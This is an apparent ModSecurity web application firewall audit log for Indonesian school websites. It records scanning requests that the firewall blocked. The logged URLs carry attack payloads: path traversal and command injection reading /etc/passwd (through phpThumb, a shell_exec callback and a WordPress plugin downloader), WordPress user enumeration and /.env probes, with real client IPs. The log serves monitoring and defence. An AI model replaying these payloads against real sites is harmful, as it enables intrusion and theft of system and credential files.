--35166163-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php?mla_download_type=text/html&mla_download_file=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747385021837761 1614 (- - -) Stopwatch2: 1747385021837761 1614; combined=507, p1=337, p2=132, p3=0, p4=0, p5=38, sr=66, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --35166163-Z-- --2bc63e58-A-- [16/May/2025:15:43:42 +0700] aCb6vte6THFz1hsaJaKUHwAAAAs 103.236.140.4 49408 103.236.140.4 8181 --2bc63e58-B-- GET /nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1 HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --2bc63e58-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2bc63e58-E-- --2bc63e58-H-- Message: Access denied with code 403 (phase 2). 
Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747385022622583 2150 (- - -) Stopwatch2: 1747385022622583 2150; combined=609, p1=417, p2=157, p3=0, p4=0, p5=35, sr=79, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2bc63e58-Z-- --69280870-A-- [16/May/2025:15:43:43 +0700] aCb6v9e6THFz1hsaJaKUIgAAABA 103.236.140.4 49414 103.236.140.4 8181 --69280870-B-- GET /plugins/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlaceline%20file.jpg%20jpeg:file.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --69280870-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --69280870-E-- --69280870-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /plugins/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlaceline%20file.jpg%20jpeg:file.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747385023210470 1416 (- - -) Stopwatch2: 1747385023210470 1416; combined=491, p1=339, p2=124, p3=0, p4=0, p5=28, sr=66, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --69280870-Z-- --c8c61a74-A-- [16/May/2025:15:43:44 +0700] aCb6wNe6THFz1hsaJaKUKgAAAAY 103.236.140.4 49430 103.236.140.4 8181 --c8c61a74-B-- GET /online-editor/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --c8c61a74-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c8c61a74-E-- --c8c61a74-H-- Message: Access denied with code 403 (phase 2). 
Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /online-editor/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747385024778760 1664 (- - -) Stopwatch2: 1747385024778760 1664; combined=512, p1=352, p2=134, p3=0, p4=0, p5=26, sr=67, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c8c61a74-Z-- --59923d25-A-- [16/May/2025:15:43:44 +0700] aCb6wNe6THFz1hsaJaKUKwAAAAM 103.236.140.4 49432 103.236.140.4 8181 --59923d25-B-- GET /assets/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --59923d25-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 
--59923d25-E-- --59923d25-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /assets/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747385024973503 1464 (- - -) Stopwatch2: 1747385024973503 1464; combined=508, p1=357, p2=123, p3=0, p4=0, p5=28, sr=65, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --59923d25-Z-- --3bb1285c-A-- [16/May/2025:15:43:45 +0700] aCb6wde6THFz1hsaJaKULAAAAAg 103.236.140.4 49434 103.236.140.4 8181 --3bb1285c-B-- GET /tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --3bb1285c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3bb1285c-E-- --3bb1285c-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747385025167366 1642 (- - -) Stopwatch2: 1747385025167366 1642; combined=504, p1=346, p2=127, p3=0, p4=0, p5=31, sr=64, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3bb1285c-Z-- --50da3b3d-A-- [16/May/2025:15:43:45 +0700] aCb6wde6THFz1hsaJaKULQAAAAQ 103.236.140.4 49436 103.236.140.4 8181 --50da3b3d-B-- GET /phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --50da3b3d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --50da3b3d-E-- --50da3b3d-H-- Message: Access denied with code 403 (phase 2). 
Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747385025361624 1385 (- - -) Stopwatch2: 1747385025361624 1385; combined=474, p1=328, p2=119, p3=0, p4=0, p5=27, sr=67, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --50da3b3d-Z-- --addaf670-A-- [16/May/2025:15:43:45 +0700] aCb6wde6THFz1hsaJaKULgAAAAo 103.236.140.4 49438 103.236.140.4 8181 --addaf670-B-- GET /ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --addaf670-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --addaf670-E-- --addaf670-H-- Message: Access denied with code 403 
(phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747385025556351 1612 (- - -) Stopwatch2: 1747385025556351 1612; combined=487, p1=332, p2=127, p3=0, p4=0, p5=28, sr=64, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --addaf670-Z-- --106faf61-A-- [16/May/2025:15:43:45 +0700] aCb6wde6THFz1hsaJaKULwAAAAI 103.236.140.4 49440 103.236.140.4 8181 --106faf61-B-- GET /scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --106faf61-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --106faf61-E-- --106faf61-H-- Message: Access denied 
with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747385025750786 1586 (- - -) Stopwatch2: 1747385025750786 1586; combined=504, p1=330, p2=136, p3=0, p4=0, p5=38, sr=66, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --106faf61-Z-- --301ca81b-A-- [16/May/2025:15:43:45 +0700] aCb6wde6THFz1hsaJaKUMAAAAAs 103.236.140.4 49442 103.236.140.4 8181 --301ca81b-B-- GET /editor/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --301ca81b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --301ca81b-E-- 
--301ca81b-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /editor/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747385025945061 1687 (- - -) Stopwatch2: 1747385025945061 1687; combined=568, p1=400, p2=139, p3=0, p4=0, p5=29, sr=97, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --301ca81b-Z-- --a6bdc317-A-- [16/May/2025:16:01:37 +0700] aCb-8de6THFz1hsaJaKUXQAAABQ 103.236.140.4 49718 103.236.140.4 8181 --a6bdc317-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 177.38.187.62 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 177.38.187.62 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a6bdc317-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a6bdc317-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747386097193132 13661 (- - -) Stopwatch2: 1747386097193132 13661; combined=22332, p1=482, p2=904, p3=0, p4=0, p5=10489, sr=76, sw=0, l=0, gc=10457 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a6bdc317-Z-- --d83a457a-A-- [16/May/2025:16:06:05 +0700] aCb__dhEtho3ciA0wegh9wAAAJM 103.236.140.4 49806 103.236.140.4 8181 --d83a457a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 37.130.40.101 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 37.130.40.101 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d83a457a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d83a457a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747386365358973 2674 (- - -) Stopwatch2: 1747386365358973 2674; combined=1357, p1=507, p2=818, p3=0, p4=0, p5=31, sr=171, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d83a457a-Z-- --806a4379-A-- [16/May/2025:16:12:02 +0700] aCcBYte6THFz1hsaJaKUhQAAABI 103.236.140.4 49910 103.236.140.4 8181 --806a4379-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 202.178.121.184 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 202.178.121.184 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --806a4379-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --806a4379-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747386722150513 2410 (- - -) Stopwatch2: 1747386722150513 2410; combined=998, p1=370, p2=609, p3=0, p4=0, p5=19, sr=104, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --806a4379-Z-- --cd9a2932-A-- [16/May/2025:16:26:05 +0700] aCcErUE0LfP59mkCzg73uQAAANI 103.236.140.4 50190 103.236.140.4 8181 --cd9a2932-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 206.189.2.13 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 206.189.2.13 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --cd9a2932-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cd9a2932-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747387565385866 764 (- - -) Stopwatch2: 1747387565385866 764; combined=305, p1=266, p2=0, p3=0, p4=0, p5=39, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cd9a2932-Z-- --6cb0dd67-A-- [16/May/2025:16:31:45 +0700] aCcGAce47ocjCGWTS4b7uwAAAEU 103.236.140.4 50264 103.236.140.4 8181 --6cb0dd67-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.111.227.36 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.111.227.36 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --6cb0dd67-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6cb0dd67-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure 